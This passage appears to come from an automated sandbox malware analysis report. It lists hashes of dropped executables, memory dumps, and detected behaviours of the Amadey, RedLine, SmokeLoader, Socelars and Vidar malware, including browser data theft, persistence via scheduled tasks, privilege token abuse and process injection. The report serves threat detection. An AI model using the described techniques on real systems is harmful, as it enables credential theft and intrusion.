SHA512 857d8e7f60b106263fefac2401fe8844a645c6cc8ac9f76e9b22d38483b769fab24e1213af66eb53b180895261b13f712ce62d5408e61853bbd553b1c019bf1c

memory/924-85-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/924-87-0x0000000064940000-0x0000000064959000-memory.dmp

memory/924-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/924-91-0x0000000064940000-0x0000000064959000-memory.dmp

memory/924-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/924-93-0x0000000064940000-0x0000000064959000-memory.dmp

memory/924-92-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/924-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/924-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/924-95-0x0000000064940000-0x0000000064959000-memory.dmp

memory/924-96-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/924-94-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/924-97-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/924-98-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1292-99-0x0000000000000000-mapping.dmp

memory/1256-100-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe

MD5 7582d154a918ef569fbee68f4228b5b1
SHA1 f21071ff67436886e6d405fb80e1eca8122045a5
SHA256 ff64865d28e16e978664eeb2edb57f0211c7d6606551c45886f2290cfb8aa825
SHA512 9699b51d23eaaacd2d2b4a9f80bd56a39fda04b9fda4bdcd21f04c69f152def37ffffe391cd66df434c6b0ab18912ab4b952e0b87589d69623d7c3fa2d00d1dd

memory/1376-103-0x0000000000000000-mapping.dmp

memory/976-105-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

memory/1864-108-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe

MD5 85346cbe49b2933a57b719df00196ed6
SHA1 644de673dc192b599a7bb1eaa3f6a97ddd8b9f0d
SHA256 45ed5fbac043165057280feac2c2b8afcf9981b5c1b656aa4bf1c03cf3144d42
SHA512 89f01bff5c874e77d7d4512ba787dd760ec81b2e42d8fe8430ca5247f33eed780c406dcd7f0f763a66fb0d20009357e93275fabeef4475fc7d08cd42cddb8cce

memory/1740-111-0x0000000000000000-mapping.dmp

memory/1752-113-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

memory/1012-117-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe

MD5 7582d154a918ef569fbee68f4228b5b1
SHA1 f21071ff67436886e6d405fb80e1eca8122045a5
SHA256 ff64865d28e16e978664eeb2edb57f0211c7d6606551c45886f2290cfb8aa825
SHA512 9699b51d23eaaacd2d2b4a9f80bd56a39fda04b9fda4bdcd21f04c69f152def37ffffe391cd66df434c6b0ab18912ab4b952e0b87589d69623d7c3fa2d00d1dd

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

memory/1460-125-0x0000000000000000-mapping.dmp

memory/928-124-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe

MD5 7582d154a918ef569fbee68f4228b5b1
SHA1 f21071ff67436886e6d405fb80e1eca8122045a5
SHA256 ff64865d28e16e978664eeb2edb57f0211c7d6606551c45886f2290cfb8aa825
SHA512 9699b51d23eaaacd2d2b4a9f80bd56a39fda04b9fda4bdcd21f04c69f152def37ffffe391cd66df434c6b0ab18912ab4b952e0b87589d69623d7c3fa2d00d1dd

memory/1976-119-0x0000000000000000-mapping.dmp

memory/888-130-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

memory/1332-138-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe

MD5 85346cbe49b2933a57b719df00196ed6
SHA1 644de673dc192b599a7bb1eaa3f6a97ddd8b9f0d
SHA256 45ed5fbac043165057280feac2c2b8afcf9981b5c1b656aa4bf1c03cf3144d42
SHA512 89f01bff5c874e77d7d4512ba787dd760ec81b2e42d8fe8430ca5247f33eed780c406dcd7f0f763a66fb0d20009357e93275fabeef4475fc7d08cd42cddb8cce

memory/1312-140-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe

MD5 85346cbe49b2933a57b719df00196ed6
SHA1 644de673dc192b599a7bb1eaa3f6a97ddd8b9f0d
SHA256 45ed5fbac043165057280feac2c2b8afcf9981b5c1b656aa4bf1c03cf3144d42
SHA512 89f01bff5c874e77d7d4512ba787dd760ec81b2e42d8fe8430ca5247f33eed780c406dcd7f0f763a66fb0d20009357e93275fabeef4475fc7d08cd42cddb8cce

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13a2838ed1d8384.exe

MD5 7eabe99c5e09596cf11f66fff7bc36b8
SHA1 67129902195dcea7b2bbe510f00731f9d191058d
SHA256 2c60f26d37373e7feddc58863c1a70f4228ed688b4ede24484a08d060a6e51f9
SHA512 e5a96013e6ec5caf75308bf97a5f6719f4893add8c99d6b6f8cd93037a64bde20f963ac7489d05237e44a7124deda6da70a676ff228a54e0b9f587fc2a776807

memory/1504-146-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

memory/684-149-0x0000000000000000-mapping.dmp

memory/304-153-0x0000000000000000-mapping.dmp

memory/1720-144-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe

MD5 4dd897695b3af1b31af9481a3ea94fd7
SHA1 9a5c9c968c50fe85de99fe2666978cc1d5c0033a
SHA256 736ef8efc4db84dbccfc69f304360abe15f12d710a983c3738af12dada10a715
SHA512 a2bf8d7d85ffdfcffc6ea1768cce4780907f3a7b247c583c376d33fa025b928320621bf295da076fbd5fa3df4d10bd424baf2200b4c181efb39f3686718b7417

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

memory/912-161-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe

MD5 96ab6b706f75ca5e1f3ccdf189ada08e
SHA1 6f851beb4ef8a534b5d65708392cefeb3650b074
SHA256 071350da27f8c628f61fdcc22f22217a96ffe413b4663349edadc7cdacf4bd18
SHA512 1671719806744e3f8f1dd21fcecaafc9f4162d76958f740ddd7729828090aecb3e5e55bd5a16d4e1aa573511b4b1d71bd86b90fab74687776fb273e8058abe34

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

memory/1244-172-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

MD5 557ee240b0fb69b1483b663a7e82a3a0
SHA1 ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA256 7b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512 cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e

memory/752-164-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

memory/1064-176-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe

MD5 e84d105d0c3ac864ee0aacf7716f48fd
SHA1 ce77ad0ab6e3861e7720ce2ae743aec4ef78f21a
SHA256 6b8ec5b540e75a799589a459cc46b4cec5c3c6d6e9376e7c48172fca66f41344
SHA512 8e66742b58408ed77946c024dd216ee162e5a72637bccb5276908cc1886c69618a3d63a17d7101d56079cb2ea3a2730fcd7773612bc28a3fb5fb0383ed651dc2

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe

MD5 de86aa83e2e8a406f396412b4fc1a459
SHA1 43b171a9c3c7a3f3d813434b4f74a1d66015244c
SHA256 58c53388484af231197685f7dce6e5bb9b1ca5a209e6f010ea8b14699394ae7f
SHA512 084cefa9847bf2e3c7bffdc7aee4c40291a0e2533972226839783ca93b3e37ddf8952a1653d2deb42cecfaa0872c756c47e14cf3eb12dacd4adc4bfbce3ce759

memory/1448-170-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe

MD5 4dd897695b3af1b31af9481a3ea94fd7
SHA1 9a5c9c968c50fe85de99fe2666978cc1d5c0033a
SHA256 736ef8efc4db84dbccfc69f304360abe15f12d710a983c3738af12dada10a715
SHA512 a2bf8d7d85ffdfcffc6ea1768cce4780907f3a7b247c583c376d33fa025b928320621bf295da076fbd5fa3df4d10bd424baf2200b4c181efb39f3686718b7417

Analysis: behavioral2

Detonation Overview

Submitted

2021-11-19 18:12

Reported

2021-11-19 18:14

Platform

win10-en-20211014

Max time kernel

14s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"

Signatures

Amadey

trojan amadey

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar Stealer

stealer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4996 set thread context of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon135d1cd0566c227c.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\RunDll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4308 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4308 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4308 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3852 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe
